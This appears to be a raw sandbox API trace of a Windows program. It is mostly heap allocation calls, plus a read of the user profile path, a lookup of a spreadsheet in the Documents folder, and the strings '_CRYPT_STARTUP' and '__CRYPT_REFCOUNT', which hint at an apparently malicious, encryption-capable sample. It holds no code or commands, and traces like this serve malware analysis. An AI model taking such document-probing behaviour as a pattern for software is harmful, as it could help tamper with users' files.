[0265.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0265.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0265.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0265.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0265.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0265.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0265.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0265.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0265.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0265.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0265.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0265.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0265.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0265.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d18 [0265.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0265.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0265.524] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0265.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0265.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0265.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0265.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0265.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0265.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0265.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e558d8 [0265.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0265.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0265.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0265.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0265.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0265.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0265.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0265.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0265.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0265.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54f08 [0265.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0265.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0265.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0265.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0265.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ed8 [0265.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0265.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0265.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0265.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51868 [0265.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0265.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0265.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0265.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0265.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0265.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0265.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0265.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54760 [0265.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0265.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0265.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0265.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0265.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0265.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0265.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546c0 [0265.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0265.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0265.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0265.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54828 [0265.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0265.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0265.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547d8 [0265.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0265.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0265.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0265.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0265.526] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0265.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0265.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0265.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0265.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0265.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54580 [0265.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0265.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0265.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0265.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0265.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0265.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546e8 [0265.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0265.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0265.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0265.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0265.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54788 [0265.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0265.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0265.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0265.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54698 [0265.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0265.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0265.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e546e8 | out: hHeap=0x970000) returned 1 [0265.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0265.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0265.527] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0265.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0265.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0265.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0265.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0265.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54800 [0265.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0265.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0265.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0265.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0265.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0265.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0265.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0265.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0265.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0265.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0265.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0265.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0265.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0265.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54620 [0265.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0265.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0265.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0265.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0265.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0265.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0265.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0265.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0265.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0265.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0265.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0265.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0265.528] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0265.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0265.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0265.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547b0 [0265.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0265.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0265.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0265.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545a8 [0265.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0265.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0265.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0265.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545d0 [0265.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0265.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0265.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e547b0 | out: hHeap=0x970000) returned 1 [0265.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0265.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0265.528] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0265.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0265.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0265.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547b0 [0265.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0265.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0265.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0265.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545f8 [0265.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0265.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0265.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0265.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54648 [0265.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0265.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0265.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0265.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0265.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0265.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0265.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0265.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0265.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0265.529] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/lC9iCEh8edFMc0F.xlsx", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1de04d10, ftCreationTime.dwHighDateTime=0x1d57ac6, ftLastAccessTime.dwLowDateTime=0xdc073890, ftLastAccessTime.dwHighDateTime=0x1d5b738, ftLastWriteTime.dwLowDateTime=0xdc073890, ftLastWriteTime.dwHighDateTime=0x1d5b738, nFileSizeHigh=0x0, nFileSizeLow=0x9adc, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="lC9iCEh8edFMc0F.xlsx", cAlternateFileName="LC9ICE~1.XLS")) returned 0xa86f50 [0265.530] FindClose (in: hFindFile=0xa86f50 | out: hFindFile=0xa86f50) returned 1 [0265.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0265.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0265.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0265.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0265.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0265.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0265.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0265.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e547b0 | out: hHeap=0x970000) returned 1 [0265.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0265.530] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0265.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0265.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0265.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0265.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0265.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54738 [0265.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0265.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0265.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0265.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0265.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0265.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0265.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0265.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0265.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0265.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0265.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0265.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0265.531] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54670 [0265.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0265.531] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0265.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54670 | out: hHeap=0x970000) returned 1 [0265.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0265.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51748 [0265.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0265.531] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0265.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0265.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0265.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0265.531] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0265.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0265.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0265.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51610 [0265.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0265.532] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0265.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0265.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0265.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0265.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0265.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0265.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0265.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0265.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0265.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0265.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0265.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0265.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b48 [0265.532] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0265.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0265.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0265.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0265.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546e8 [0265.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0265.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0265.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0265.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547b0 [0265.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0265.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0265.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0265.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54710 [0265.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0265.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0265.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0265.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: 